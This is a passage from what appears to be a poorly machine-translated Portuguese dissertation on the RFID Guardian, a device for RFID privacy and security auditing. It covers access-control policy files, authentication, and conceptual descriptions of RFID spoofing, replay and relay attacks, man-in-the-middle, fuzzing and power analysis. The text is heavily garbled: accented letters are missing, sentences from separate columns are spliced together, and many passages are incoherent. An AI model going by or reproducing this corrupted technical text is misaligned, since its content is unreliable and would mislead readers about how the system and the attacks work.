Funcionalidade permite que ambas as negociaes por uso de segurana entre o Guardian RFID e leitores de RFID, e tambm reduz a necessidade de revogao da criptografia Chaves RFID tag (j que nunca leitores RFID tem as chaves tag para comear.) Aqui est como RFID Funcionalidade Proxy funciona: Um leitor RFID no confivel passa um pedido para uma consulta desejada para o Guardian RFID, de preferncia atravs de um canal seguro. Sobre a concluso com xito de uma negociao de segurana, possivelmente complexa, a RFID The Guardian, em seguida, emite novamente a consulta de forma criptografada, em nome do RFID leitor. The Guardian RFID, em seguida, recebe a resposta tag criptografado, descriptografa ele, e encaminha a resposta para o leitor RFID que a solicitou. Pr-requisitos Funcionalidade Proxy para RFID so criptograficamente habilitado tags RFID, o cendescentralizada de armazenamento de chaves de tag RFID, e 2-way RFID comunicaes entre o RFID RFID Guardian e leitores. Infelizmente, RFID Funcionalidade Proxy vai no trabalho com as tags RFID de baixo custo que so muito baratos para o apoio necessrio on-tag mecanismos de segurana. Seletiva RFID Jamming um exemplo de mediao destrutiva, onde o RFID Guardio blocos de consultas no autorizadas RFID em nome de tags RFID. Por filtragem consultas RFID, RFID fornece Seletiva Jamming off-tag de controle de acesso para tags RFID de baixo custo que no so poderosos o suficiente para suportar as suas prprias on-tag mecanismos de controle de acesso. Aqui est como seletiva Jamming RFID funciona: Uma RFID leitor envia uma consulta para uma tag RFID, ea captura RFID Guardian e consultar a descodifica em tempo real. Em seguida, determina se a consulta permitida, e se a consulta no permitida, o Guardio RFID envia um sinal de interferncia que apenas o tempo suficiente para bloquear a resposta tag RFID.

7.3.2. Implementao
Poltica The Guardian RFID de segurana implementado como uma lista de controle de acesso (ACL). O ACL se assemelha a um usado por um filtro de pacotes standard, que permite ou nega RFID trfego baseado no leitor de consulta (se conhecido), a tag alvo (s), a tentativa de comando e do contexto (se houver). Um ACL consiste em vrios arquivos: A. Tags tags de arquivo contendo e / ou conjuntos de tags Um arquivo. Leitores contendo os leitores e seus papis Um arquivo. Acl contendo regras e contextos

7.3.3. Exemplo ACL Policy


O exemplo a seguir ilustra como o controle de acesso granular implementado em The Guardian RFID usado para filtrar tpicas comunicaes ISO-15693 RFID.

SCE . 7,3

ACESSO CONTROLE

97

Exemplo: Access Control List

################################################## # # # Exemplo regras ################################################## # # # Por padro, queremos deixar sozinho o trfego de RFID P15693 regra ACCEPT { role = *; tags = *; query = {command = *; }; }; # Mas, geralmente deseja bloquear todas as consultas para nossas marcas P15693 regra DENY { role = *; tags = @ TI BRANCO; # Deixar de fora: o padro de consulta = # {command = *; }; }; # Que o meu guardio em casa ler todas minhas marcas P15693 regra ACCEPT { role = TRUSTED; query = {command = *; }; tags = @ TI BRANCO; }; Como indicado nos comentrios, a aceitar / rejeitar a tomada de decises acontece em trs camadas, cada uma com nvel de prioridade tm cada vez mais.

Exemplo: Lista Leitor

98

TOOLS PARA RFID P RIVACY

CHAP. 7

# Leitores leitor CASA READER { key = {type = TripleDES; store = authkey1; }; }; leitor SCHIPHOL { key = {type = rsa pblico; loja = "schiphol-public.pem"; }; }; leitor MES READER {}; # Funes papel TRUSTED { CASA READER, }; Lista Leitor demonstra como definir os leitores e papis. Os leitores so instncias individuais de leitor RFID HW, e os papis so simplesmente grupos de leitura ers com um acesso baseado em funo compartilhada tecla Control (RBAC). Por exemplo: o papel "confivel" definido aqui, que, como recordamos, capaz de tags de consulta em conjunto @ TI BRANCO. Exemplo: Lista de Tag @ Tag P15693 PHILIPS { tag P15693 {TagID = 0xe0040100003b2252; }, tag P15693 {TagID = 0xe0040100003afab9; }, tag P15693 {TagID = 0xe0040100003b0cbd; }, }; @ Tag P15693 BRANCO TI { tag P15693 {TagID = 0xe0070000023426f8; }, }; Lista de Tag demonstra como definir tags e conjuntos tag. Por exemplo: o protegidos tag-set "TI BRANCO" (como mencionado na ACL) definido aqui.

SCE . 7,4

AUTHENTICATION

99

7.4. AUTENTICAO

Controle de acesso regula que os leitores de RFID podem acessar etiquetas RFID que em que circunstncias. No entanto, esse mecanismo precisa de uma maneira confivel de determinar qual o leitor o envio de qualquer consulta RFID dado. Algumas etiquetas RFID podem executar a autenticao direta com os leitores de RFID, mas isso geralmente no funciona com baixo custo tags, ou pode ser necessrio modificar interfaces de corrente de ar a fim RFID para obter esses esquemas de trabalho [38]. Na etiqueta de autenticao tambm no pode diretamente convey os resultados de autenticao para nvel superior RFID sistemas de gerenciamento de privacidade. Em contraste, o Guardio RFID oferece "autenticao off-tag" por meio da autenticao RFID autenticao Guardio-reader e apoiando directamente o acesso Leitores RFID em nome das tags RFID,deve ser implementada ao longo dos dois forma RFID canal de da seo anterior. mtodos de controle comunicao, usando qualquer padro de desafio-resposta algoseado em regras que amplamente aplicada e compreendida. Este desafio-resposta deve apoiar tanto one-way e autenticao mtua, para enfrentar o risco de estrangeiros (Isto , no confivel) Guardians RFID. O protocolo de autenticao sempre iniciada pelo leitor RFID, j que os pedidos de acesso RFID tag forma assncrona a partir da RFID Guardian. Um esquema de distribuio de chaves tambm necessrio para facilitar a exmudana de chaves compartilhadas entre o Guardian RFID e leitores RFID. Chave prestabelecimento til para troca de chaves com leitores RFID que o usurio de planos ter uma relao duradoura com (por exemplo, o supermercado de bairro), e isso troca de chaves poderia ocorrer usando uma variedade de out-of-band meios. On-the-flychave distribuio, por outro lado, til quando o Guardian RFID quer estabelelish uma relao de confiana temporria com um desconhecido leitor RFID. Por exemplo, Nancy quer que ela pode RFID Guardian para realizar uma transao com um leitor de RFID localizada em um supermercado que ela passa a ser visitado. On-the-fly-chave diso poderia usar em comunicaes de banda RFID e tambm pode tirar proveito de uma suporte de infra-estrutura de Chaves Pblicas. Aps a autenticao bem-sucedida de um leitor, o Guardio RFID enfrenta uma problema prtico: para tags RFID noncryptographic no h nenhuma maneira fcil de deterconsultas mina que se originam a partir da qual RFID RFID leitor. A melhor soluo seria para as comisses de RFID normalizao para adicionar espao para autenticao informaes para a interface area RFID. No entanto, at que isso acontea, estamos usando nossa prpria soluo imperfeita: na ltima etapa de autenticao leitor RFID um ananuncia que as consultas que vai executar, e essas consultas so anotadas como parte de uma "sesso autenticada", quando eles ocorrem.

100

TOOLS PARA RFID P RIVACY

CHAP. 7

7.4.1. Infra-estrutura de back-end


Para evitar que um Guardio RFID de si mesmo sendo falsificado por um leitor malvolo, Guardies e os leitores devem autenticar um ao outro. Alm disso, os leitores precisam autenticar-se para acessar tags, uma vez que o conjunto de regras padro especifica que o Guardio desconfia todos os leitores desconhecidos. Para suportar a autenticao como usamos protocolos de autenticao existentes. Mais interessante e vale a pena uma explicao so as infra-estruturas de autenticao prevemos para os nossos cenrios. Simtrica-Key base Para muitas aplicaes dependncia de chave simtrica autenticao baseada o melhor escolha. Esta evitar o uso de servios caros e rgidos PKI. Exemplo de tal cenrios so os seguintes: Empresa baseada em Uma pequena loja pode usar tags RFID para o inventrio gesto ment. A loja tem um nico leitor na caixa registradora para consulta a partir de um qualquer leitor de diferente considerado uma ameaa. Em tais situaes um pairwise symmetric chave compartilhada entre o leitor eo Guardian. Neste contexto, o lojista pode descobrir diretamente se o dispositivo est comprometida e apenas remova a tecla correspondente ao leitor do Guardian RFID. L h informaes de Um usurio quer permitir que somente alguns leitores designado Baseada no usuriorevogao a ser divulgado. (por exemplo, as de sua famlia e amigos) para acessar suas tags. Com a assistncia do RFID Guardian, ela gera chaves simtricas e compartilha-los entre seus Guardies e os leitores, seja por inserir a chave no leitor-chave bordo ou por qualquer tipo ressuscitando-patinho outros de troca. Aqui, novamente revogao assumido ser facilmente manuseado pelo usurio, se um comprometido dispositivo descoberto. Assimtrica-Key Baseado Outras aplicaes devem escala mundial e tambm podem ser divididos entre diversos orgazaes, de modo que o custo de uma PKI equilibrado pelo seu benefcio ea necessidade de apoio no-repdio. Exemplos de tais cenriosacontece em outras indstrias (ie consumidor Global de PKI Semelhante ao que so os seguintes: electronics para a certificao de dispositivos compatveis), sistemas RFID fabricantes pode formar um consrcio para executar uma PKI global. Como uma PKI pode ser usado para Certifico RFID equipamentos; um protocolo como SSL pode ser usado com esses certificados. Este um modelo bem conhecido (com problemas bem conhecidos, tais como revogao) [146] [126].

SCE . 7,4

AUTHENTICATION

101

Empresa baseada em PKI Muitas empresas podem querer executar os seus prprios para PKI certificar os seus prprios leitores e as de seus fornecedores e / ou clientes. WalMart um exemplo de uma dessas empresas. O custo extra pago para implantar o PKI equilibrada pela flexibilidade para emitir certificados conforme necessrio, sem limitaes externas. As questes de revogao de costume se aplicam aqui tambm. Consumidor baseado em PKI Os consumidores podem querer criar sua prpria PKIs para a finalidade de autenticar um nmero limitado de leitores externos que albaixo para acessar suas tags. Estes leitores no so maliciosos, mas os consumidores podem no confio neles. No entanto os consumidores podem achar que conveniente para deixar suas marcas interagir com esses leitores. Neste cenrio, os leitores so externos (por exemplo, pertencem s lojas os consumidores ir), enquanto o Guardian, que executado os servios de PKI, propriedade do consumidor. Diferentes dos acima usurio cenrio base onde os leitores (ou mais precisamente os seus proprietrios) foram confiveis, aqui eles no so confiveis, assim, servios de PKI so necessrios para questes de responsabilidade.

102

TOOLS PARA RFID P RIVACY

CHAP. 7

CCAPTULO 8

Ferramentas para RFID Segurana


No existe uma indstria de segurana RFID, mas talvez deveria haver. Radiofrequncia Identificao (RFID) sistemas deve ser submetido aos mesmos tipos de auditorias de segurana e "Red teaming", como outros sistemas de computador amplamente implantado. No entanto, RFID deempregadores falta de conhecimento sobre segurana de computadores, enquanto o computador de segurana prosionais no possuem as ferramentas para ajud-los escala a curva de aprendizagem e transferem a sua habilidades para o domnio de RFID. O resultado final que RFID implantadores so incapazes de realizar uma avaliao adequada dos riscos de seus sistemas, e, portanto, de segurana "por obscurana "reina como um quase incontestado" mecanismo de proteo "para a maioria do mundo real Implementaes de RFID. Para resolver este problema, criamos o Guardian RFID para servir tambm como uma ferramenta verstil para RFID Segurana. Nesta capacidade, ns encaramos o RFID Guardian como uma cruz entre figurativa Kismet [83] e Metasploit [100] para RFID, com a implicao de abertura do domnio RFID para kiddies tanto script e profissionais de segurana da mesma forma. Mais concretamente, o Guardio RFID proporciona facilidades para: Diagnstico e Monitoramento (ie, deteco de sinais, a auditoria de trfego, Deteco de Intrusos), Packet 8.1. Diagnstico e monitoramento Manipulao (ie, spoofing tag RFID de revezamento, / replay ataques, Man-in-theMiddle), Testes de penetrao (ie, RFID fuzzing, RFID anlisesobre RFID opOs mass media tm gerado uma grande confuso de poder). varia erational. Algumas vendas da indstria RFID e marketing pessoal se apegam tenazmente alegao de que nominal varia de leitura so o limite absoluto, enquanto agitadores fazer reivindicaes selvagens sobre como etiquetas passivas RFID podem ser rastreados por satlites. A rede resultado a consequncia de que ambos os implantadores RFID e os consumidores tm dificuldade em

104

TOOLS PARA RFID S EGURANA

CHAP. 8

visualizar tanto o terico ou prtico limitaes do alcance de leitura, e apenas fazer no tm um sentido realista da ameaa que eles ou suas implementaes face. The Guardian RFID faz uma contribuio til ao oferecer uma plataforma para diagnstico experimental e monitoramento das emisses de rdio de leitores ou tags em uma implantao de RFID. Ele permite que os auditores de segurana para responder s seguintes queses: o quo longe pode um atacante espionar respostas tag RFID? Sobre RFID consultas leitor? Com uma antena direcional super-grande? E qual o intervalo para realizar anlise de trfego? O RFID Guardio HW modular, assim voc pode simplug-ply em um front-end analgico para o cenrio que voc deseja testar. Alm disso, ao contrrio, com o simples uso de um osciloscpio, o Guardio RFID capaz de interpretar RFID consultas / respostas, permitindo ao auditor para fazer uma distino adicional entre os intervalos de sinais RFID que pode ser detectado vs decodificado. Tambm vale a pena o que sugere que o Guardian RFID pode ter logstico aplictions, uma vez RFID tag posicionamento e leitura taxas so questes que perpetuamente conencontrados RFID implantadores. Por exemplo, implantadores RFID pode usar o Guardian RFID a tomar medidas de intensidade do sinal-para ajudar a determinar as posies ideal de Tags RFID e leitores RFID.

8.1.1. RFID Auditoria de Trfego


O RFID Segurana toolkit realiza "auditoria de trfego", na forma de RFID scan registro e RFID tag registro. Ambos os logs so armazenados em um formato binrio, que pode ser descompactado por um shell script que exibe o seguinte formulrio. Log digitalizao exemplo
Quadro de pedido: MRG ARMAO 15693 GET SISTEMA DE INFORMAO (MRG QUADRO DA BANDEIRA 15693 TAXA DE DADOS) Quadro de pedido: MRG ARMAO 15693 READ BLOCK MLTIPLOS (MRG ARMAO 15693 TAXA DE DADOS-FLAG ARMAO MRG FLAG ENDEREO 15693) uid = 00000000f0f0f0f4, primeiro = 0, n = 1 +3, Quadro de pedido: MRG ARMAO 15693 WRITE BLOCK MLTIPLOS (MRG QUADRO DA BANDEIRA 15693 TAXA DE DADOS - QUADRO MRG FLAG ENDEREO 15693) uid = 00000000f0f0f0f4, primeiro = 0, n = 1 +3, ((0x4D 0x52 0x47 0x20) (0x52 0x65 0x61 0x64) (0x65 0x72 0x20 0x43) (0x74 0x6e 0x6e0x63)), Quadro de pedido: MRG ARMAO 15693 INVENTRIO (FRAME MRG 15693 FLAG-TAXA DE DADOS ARMAO MRG BANDEIRA INVENTRIO 15693) masklen = 0x04, mask = 0x0,

Log Tag exemplo

SCE . 8,2

PACKET MANIPULATION

105

0 0xe007000012d716b0 Sex Nov 09 15:21:47 2007 1 0xe007000012d716b1 Sex Nov 09 15:21:47 2007 2 0xe007000012d716af Sex Nov 09 15:21:47 2007 0 0xe007000012d716b0 Sex Nov 09 15:23:54 2007 3 0xe007000012d716ac Sex Nov 09 15:23:54 2007 4 0xe00780c335c6415b Sex Nov 09 15:23:54 2007 5 0xe007000012d716ab Sex Nov 09 15:23:54 2007 6 0xe007000012d716bb Sex Nov 09 15:23:54 2007 7 0xe007000012d716b8 Sex Nov 09 15:23:55 2007 8 0xe0070000023426f8 Sex Nov 09 15:23:55 2007

O RFID Segurana toolkit tambm mantm registros de configurao (para gravao alteraes de configurao), alm de "tempo real alerta", no qual certas (configurvel) tipos de eventos registrados fazer com que o usurio seja audvel ou visualmente avisado em tempo real.

8.1.2. RFID de Deteco de Intruso


Assim como tcpdump logs fornecer dados teis para IDSs baseados em rede, o RFID Guardio RFID scan logs e logs tag RFID pode prestar um importante contributo para uma "Intrusion Detection System" (IDS) para RFID. Mais especificamente, podemos processo esses dados para busca de ataques contra as etiquetas RFID (manipulao maliciosa ou seja, dados tag), os ataques contra os leitores RFID (ie RFID malwares [132]), ou mesmo ataques Com padro de rede baseada em IDS, os possveis mtodos de pesquisa para RFID contra o Guardian RFID em si. "intrusions "incluem assinatura correspondente (ou seja, explorar as assinaturas correspondentes RFID) e deteco de anomalias (isto , o comportamento do sistema de sinalizao anormal RFID). Claro que, para implementar um sistema deste tipo, h uma srie de questes de pesquisa abertas incluing: Como voc define uma intruso? O que acontece se for detectada uma intruso? Como voc lida com falsos positivos / negativos? E teria de Preveno de Intruso Sistemas de RFID faz sentido? Temos a inteno de explorar essas questes e conceitos em pesquisas futuras.

8.2. MANIPULAO DE PACOTES


Existem vrias maneiras em que se pode manipular o trfego de RFID. Este seo ir descrever brevemente spoofing RFID tag, seletivo RFID jamming, RFID repetio / relay ataques, e RFID baseados em Man-in-the-Middle (MITM) ataques.

106

TOOLS PARA RFID S EGURANA

CHAP. 8

8.2.1. RFID Spoofing / Jamming


A implementao de RFID spoofing tag RFID e jamming seletivos so dedescrito no Captulo 6. Ambas as tcnicas so bastante flexveis: podemos facilmente spoof 200 etiquetas de uma s vez, jam seletivamente um nmero igual de respostas tag, e "substituir as marcas com os falsos "atravs da realizao de spoofing e jamming, ao mesmo tempo. Mas mais importante, o Guardian tambm usa RFID tag spoofing e jamming como atmicas unidades sobre a qual construmos a funcionalidade de segurana mais complexos RFID.

8.2.2. RFID de repetio / Relay Ataques


The Guardian RFID pode realizar ataques de repetio, ouvindo um leitor de RFID consulta, registrando a resposta tag, e depois de spoofing resposta tag que aps a recepo de outro leitor de consulta idnticos. Alm disso, o Guardio RFID pode realizar relay ataques ouvindo consultas leitor RFID, e transmitir a consulta (de banda) para outro Guardian (digamos Guardian 2), que executa a idnticos RFID consulta leitor, escuta em resposta tag, e em seguida envia o re-tag sponse (fora da banda) de volta para um Guardio, que ento pardias a resposta a tag o leitor RFID original. Vale a pena notar que os ataques tm relay muito estrita restries de tempo, que requerem um meio de out-of-band com um suficientemente elevado largura de banda. Nenhum destes ataques so novos: ataques de repetio RFID tm sido realizados usando o III ProxMark [177], e Verichip cloner [178], e relay ataques RFID foram implementadas por Kfir e L [84]. No entanto, importante mencionar esses ataques, porque um conjunto de testes de segurana RFID incompleta sem eles.

8.2.3. RFID Man-in-the-Middle


Um atacante pode executar um ataque MITM leitor RFID baseado ouvindo a incio da consulta leitor de entrada, garbling o final da consulta (CRC + EOF), e depois retransmitir a consulta (w / modificaes desejadas). Este tipo de MITM deve ser bastante fcil de fazer, uma vez que no h problemas em tempo real. Um atacante tambm pode executar um ataque MITM tag RFID baseado ouvindo o incio da resposta tag entrada, garbling o final da resposta tag (CRC + EOF), e depois retransmitir a resposta tag (w / desejado modificaes). Isso um pouco mais complicado, devido s restries de tempo de ISO-15693. No entanto, uma outra opo se o leitor RFID passa a ser de votao (o que eles normalmente so) a de transmitir a resposta tag durante a prxima vez que o leitor de RFID questes a consulta.

SCE . 8,3

PENETRATION TTeressante

107

8.3. Teste de Invaso


Teste de penetrao um meio necessrio de testar a segurana de RFID firmware e implementaes de middleware. Esta seo ir discutir nossa implementao de RFID fuzzing, e hipteses sobre a futura aplicao do diferencial Anlise de energia no The Guardian RFID.

8.3.1. RFID Fuzzing


Difuso um mtodo de teste de software por ver como ele reage completamente unesperado entradas. Foi inventado em 1989 pelo Prof Barton Miller na Univ. de Wisconsin-Madison. Tambm foi recentemente popularizada por H.D. Moore e outros, com seus Ms de bugs do navegador [113] e Ms de bugs de kernel [61]. Fuzzing funciona lanando gerado aleatoriamente (parcialmente invlido) de dados em algum camada de software. O topo da camada de lixo contm aleatrio, mas todas as camadas subneath deve ser correta para evitar o pacote fuzzed de ser descartado como uma burst de rudo. Difuso tem sido usado para procurar por zero-day exploits em navegadores web, Kernels do sistema operacional, sistemas de arquivos, etc. RFID fuzzing testes RFID middleware. Teste necessrio porque malware (exploits, vrus, worms) representa uma ameaa para RFID middleware [132], exigindoo do middleware para ser testado para falhas de segurana. Para executar este teste de segurana, profissionais precisam de ferramentas adequadas. O RFID Security Toolkit pode usar a sua tag 'transtransmissor "para enviar pacotes falsos cuidadosamente elaborada para os leitores RFID para testar sua capacidade para resistir a esses contributos e encontrar bugs de segurana no middleware de seus backend sistemas. RFID middleware tem 3 camadas, que podem ser fuzzed: Framing camada: Padres RFID ditam o formato de bits e enquadramento delimITERS, incluindo 0s, 1s, start-de-frame, e no fim-de-frame. Elementos variveis no enquadramento camada incluem: parmetros de tempo, freqncias, ea adeso ao Manchester codificao. Tratamento de quadros que violam as normas hardware especfico, de modo esta potencialmente uma camada em que podemos quebrar o middleware RFID. Camada de comando: Padres RFID ditam o formato de comandos de baixo nvel. Comandos de exemplo incluem: consulta de estoque e Read / Write Data Block. RFID pedidos / respostas pode ter combinaes invlidas de dados / flags / parmetros, e assim por diante. Por exemplo, uma consulta de inventrio sem a flag de inventrio ou de outros consultas com a flag de inventrio, ou um comprimento de todos os dados incorretos pode causar a middleware para falhar. The Guardian RFID tem rotinas para gerar aleatoriamente invlido combinaes de parmetros para tentar induzir um fracasso. Camada de aplicao: Na camada de aplicao, middleware RFID normalmente performas operaes com IDs tag adquiridos e na tag de dados. The Guardian RFID pode fuzz camada esta alimentando o middleware RFID exploits (incluindo SQL / code

108

TOOLS PARA RFID S EGURANA

CHAP. 8

ataques de injeo e estouros de buffer). Podemos usar o padro de nvel de aplicativo fuzzers para este, aqui, o Guardio RFID simplesmente fornece um meio para o envio de estes dados atravs da interface sem fio RFID. Temos vindo a utilizar beSTORM [141] da Beyond Security para difuso do camada de aplicao do Edge Server Sensor Oracle (SES) para RFID, como mostrado na Figura 8.1. Aqui est como funciona: Painel 1: beSTORM gera lixo nvel aleatrio aplicao Painel 2: O filtro fuzzing codifica os dados (conforme especificado pelo beSTORM) em um quadro vlido, que enviado atravs da interface RFID Painel 3: Agora voc pode ver o lixo que beSTORM produzido no back-end logs de auditoria do banco de dados (Oracle Server SES para RFID.)

8.3.2. RFID Anlise Diferencial Energia


The Guardian RFID tambm til para a realizao de canal lateral-ataques em RFID tags e / ou cartes inteligentes sem contato. Ataques de anlise de energia so um tipo de ataque no-invasivo de canal lateral. Poder consumo de um circuito CMOS depende dos dados processados. Crip-muitos algoritmos tographic testar todos os bits em uma seqncia chave, realizando diferentes aes para um bit 0 do que para um bit 1. Este irradiar aes diferentes quantidades diferentes de energia eltrica, permitindo que um invasor para obter informaes valiosas sobre as teclas e outros dados internos. Anlise de poder um ataque muito comum contra o smartcartes. Para fazer a anlise do poder, pode-se medir flutuaes de energia no campo de RF em o perodo entre RFID tag-leitor de comunicao, que quando alguns RFID Tag executar operaes criptogrficas. Ns registramos um grande nmero de poder traos, utilizando um PicoScope 5203 e uma sonda de antena personalizado loop, e analisou o traos com o software Inspector da DPA Riscure. O prximo passo realizar isso no The Guardian RFID.

SCE . 8,3

PENETRATION TTeressante

109

Figura 8.1: RFID Fuzzing: uma ilustrao passo-a-Passo

110

TOOLS PARA RFID S EGURANA

CHAP. 8

CCAPTULO 9

Discusso
9.1. Ataques contra o GUARDIAN RFID
The Guardian RFID um sistema de computador, com a sua prpria falibilidade e fracassas. Esta seo ir discutir algumas maneiras em que os atacantes podem potencialmente explorar o Guardian ou o RFID tags RFID / leitores pertencentes a seus usurios.

9.1.1. Denial of Service


Vamos considerar como os atacantes vo tentar derrotar o Guardio RFID. Eles podem usar leitores maliciosos ou tags falsos que tentam confundir ou trancar o guardio RFID, para que as marcas que protege pode ser lido de qualquer maneira. Como para com todos os SW, o principal defesa contra a explorao bem conhecidas como estouros de buffer deve ter muito cuidado programao do Guardio RFID software, que ajudado por seu cdigo limitado tamanho. Na falta deste, o seu prximo ataque provvel que seja um ataque DoS (Denial-ofService) sobrecarregar o Guardio RFID e impedi-la de fazer seu trabalho. Dois RFID Recursos Guardian so candidatos bvios para o ataque: a sua largura de banda de rdio limitada e sua memria limitada. RFID comunicaes sempre seguir o mestre-escravo padro, onde a tag (escravo) deve responder aps um atraso bem definido. Atacante durante este atraso no vivel: seria alertar imediatamente o Guardian RFID e que iria confundir as tags tambm. Atacando entre os comandos leitor faz no constituem uma vulnerabilidade de negao de servio do canal de comunicao: ela seria o mesmo como uma ao leitor regular. O atacante poderia jam o canal, claro, mas ento ele no conseguia ler todas as tags, que a razo pela qual presume que ele quer aleijar o Guardian RFID. A outra vulnerabilidade potencial limitado a RFID Guardio da memria flash. Um ataque memria flash pode atingir qualquer uma das trs estruturas de dados: o

112

DISCUSSO

CHAP. 9

lista de tag propriedade, a lista de presena tag, ou o log de auditoria de verificao. Se um atacante com a milhares de bateria-powered dispositivo simulado de novas marcas em uma tentativa de preencher a lista de propriedade ou a lista atual, o Guardio RFID podem avisar o usurio sobre esta atividade anormal. Alternativamente, o atacante DoS poderia tentar encher os logs de auditoria. Isso no causar uma perda em proteo de tags do proprietrio, mas certamente dificulta a RFID Capacidades guardio de auditoria. A taxa mxima em que os pedidos podem ser lanado determinado pela largura de banda do canal de rdio eo mnimo tamanho do quadro, sendo que ambos so especificados pela norma. A taxa de dados 26,48 kbps. O quadro mnimo de (SOF, 32 bits de dados, EOF) que leva 1,322 ms seguido por um silncio obrigatrio de 320,9 mS, que trabalha para fora a um mximo de 613 pedidos / sec. Uma entrada de log de auditoria contm o ndice da marca a ser alvo, um ndice de contexto, o comando e um timestamp, o que resulta em 2 +2 +1 +4 = 9 bytes bytes. Com 613 pedidos / seg, o atacante pode encher 5.517 bytes de memria flash por segundo. O prottipo RFID Guardian tem 16MB de flash, que 14MB disponvel para explorao madeireira. Assim, um ataque de velocidade mxima seria necessrio 42 consecutivos minutos de detonando a toda a velocidade para encher a memria. Escusado ser dizer que o RFID Guardio deveria soar um alarme muito antes de a memria comea a encher up, cumprindo assim o seu trabalho de avisar o utilizador de um ataque. Alm disso, a memria flash muito barato: mais 16 MB pode acrescentaria menos de 2 dlares para a produo custo. Para resumir, o Guardio RFID parece imune aos ataques DoS que pode identificar, ou porque eles tambm perturbam a interao RFID regular, ou porque o Guardian RFID tem recursos suficientes para se defender o tempo suficiente para alarme de seu proprietrio, aps a ameaa continuou por algum tempo.

9.1.2. Problema da estao escondida


Em contraste com a Negao de Servio acima de ataques, h uma srie de ataques que so bem sucedidos contra o Guardian RFID. Primeiro de tudo, o Guardio RFID no pode proteger as etiquetas de RFID consultas pode no ouvir. Para realizar consultas inaudvel RFID, um atacante pode usar um superantena direcional ou uso cuidadoso posicionamento geogrfico (isto conhecido como o Problema "estao escondida".) Embora este ataque seria bem sucedido, assumimos que um intruso teria dificuldades em manter isso por muito tempo, ento ns s lidar com o "nico leitor" problema nesta dissertao.

SCE . 9,2

LJURDICOS EuUESTES

113

9.1.3. Etiquetas incompatveis


The Guardian RFID tem dificuldade em lidar com as tags trabalhar com desconhecidos standards / freqncias. Alm disso, os atacantes podem fugir RFID Guardio proteo por pessoas de rastreamento usando tags com pseudnimos. Se o Guardio RFID tem o lista pseudnimo (ou semente PRNG), pode correlacionar os IDs, mantendo-se ciente de que est lidando com apenas uma tag. Se o Guardio RFID no tem a lista (ou semente), ele vai pensar que est lidando com vrias marcas que so observados apenas uma vez.

9.1.4. Anlise de Sinais diferencial


Leitores de RFID poderiam rastrear o espao de coliso, atravs de colises de re resolver os IDs de tags RFID Guardian-protegidos RFID. Podemos melhorar essa situo, acrescentando alguns colises extra, que far com que o algoritmo para atravessar maior parte do espao de identificao, fazendo com que parea mais de uma marca protegida presentes.

9.2. QUESTES JURDICAS


The Guardian RFID uma tecnologia de dupla utilizao; como qualquer teste de penetrao-plat forma, ela pode ser usada para fins nobres e menos nobres. No entanto, a experincia em a indstria de segurana de computador mostra que os hackers tero acesso a essas ferramentas de qualquer maneira, ento RFID implantadores e especialistas em segurana de computadores tambm devem ter acesso para eles. The Guardian RFID certamente vai enfrentar problemas legais. Primeiro de tudo, interferindo com uma implantao de RFID ou de middleware que no pertencem ao auditor (ie, invadir um sistema de backend RFID e ler ou modificar o seu cdigo ou dados) flagrantemente ilegal. No entanto, no para responder a uma consulta de RFID ou bloqueando uma RFID consulta ou dar uma resposta incorreta mais turvo como jurisdies poucos qualquer legislao sobre o assunto. Em tais situaes, se um caso chega aos tribunais, o advogados de oposio trazer analogias favorveis ao seu lado que eles esperam que influenciar o jri. Por exemplo, qual o estatuto jurdico do Guardian (seletivamente) bloqueando consultas no solicitadas? O advogado do auditor provvel que dizer: "Incoming RFID consultas so como e-mail spam: voc no pediu para ele, voc no quer que ele, e voc certamente no tm obrigao legal de trat-lo gentilmente e fazer o que ele est pedindo . voc faa "O advogado poderia acrescentar:" E voc tem todo o direito de tomar medidas para prevenir futuros tais consultas at mesmo a ser entregue, assim como voc tem a direito de empregar um filtro de spam. "Se a consulta de origem vem de um governo oficial execuo de suas funes oficiais (por exemplo, uma varredura oficial de imigrao

114

DISCUSSO

CHAP. 9

um passaporte RFID), a analogia com a quebra de spam para baixo, claro. Outra questo no resolvida que possui "seu" tags? Se um consumidor compra um produto que contenha uma tag RFID, a loja pode reivindicar a tag contm o seu inteda propriedade intelectual e apenas o licenciamento da marca para o consumidor? Livros e DVDs exercer normalmente texto explicando que a editora possui o IP e que o conconsumidor apenas leasing, no compr-lo. RFID underwear vai ter para transportar FBI anncios no futuro? Alm disso, com livros e DVDs, o consumidor faz tm o direito de destruir parcialmente o produto (por exemplo, rasgar pginas de um livro.) Maio o consumidor desativar ou destruir os chips RFID em produtos adquiridos ou de outra forma impedir que a loja de consultar as fichas depois da compra? Toda a estrutura legal para etiquetas RFID est totalmente claro no momento, e assim o direito das pessoas de interferir com sua operao. Ele provavelmente ir levar anos antes de leis e processos judiciais produzir alguma aparncia de clareza e da resultados podem diferir acentuadamente de jurisdio para jurisdio.

CCAPTULO 10

Trabalhos Relacionados
Este captulo apresenta uma viso geral da investigao em relao segurana e privacidade dos Radio Frequency Identification tecnologia, incluindo tanto ofensiva quanto defensiva tcnicas. O captulo concluir comparando e contrastando o mximo intimamente relacionados com tecnologias para o Guardian RFID. Leitores interessados que desejam obter mais informaes sobre RFID Segurana / Privacidade tambm so encorajados a verificar esses trabalhos de pesquisa. [139] [167] [47] [73] [74] [124] [147]

10.1. ATACANDO RFID


Os agressores tm uma cornucpia de maneiras possveis para atacar as implementaes de RFID: tag skimming, tag de manipulao de dados, emulao de tag de revezamento, / replay ataques, clonagem tag, e canal lateral-ataques. Esta seo discutir o state-of-the-art, alm de dar anedotas da vida real, para cada um desses tipos de ataques.

10.1.1. Skimming RFID


RFID desnatao tag basicamente um termo sofisticado para a leitura no autorizada de RFID tags. Vrios relatos de manifestaes pblicas tm mostrado que a prtica desnatao gama de respostas tag RFID maior que a distncia de leitura nominal anunciados pelos fabricantes de equipamentos RFID. Short-Range Skimming A mdia gosta de relatrio sobre como os hackers fez um esporte de esquiar em distncias cada vez maiores, mas RFID implantadores deve ter em mente que os ataques menos "emocionante", mas igualmente devastador pode aconcaneta como um resultado de curto alcance skimming.

116

RExultante W ORK

CHAP. 10

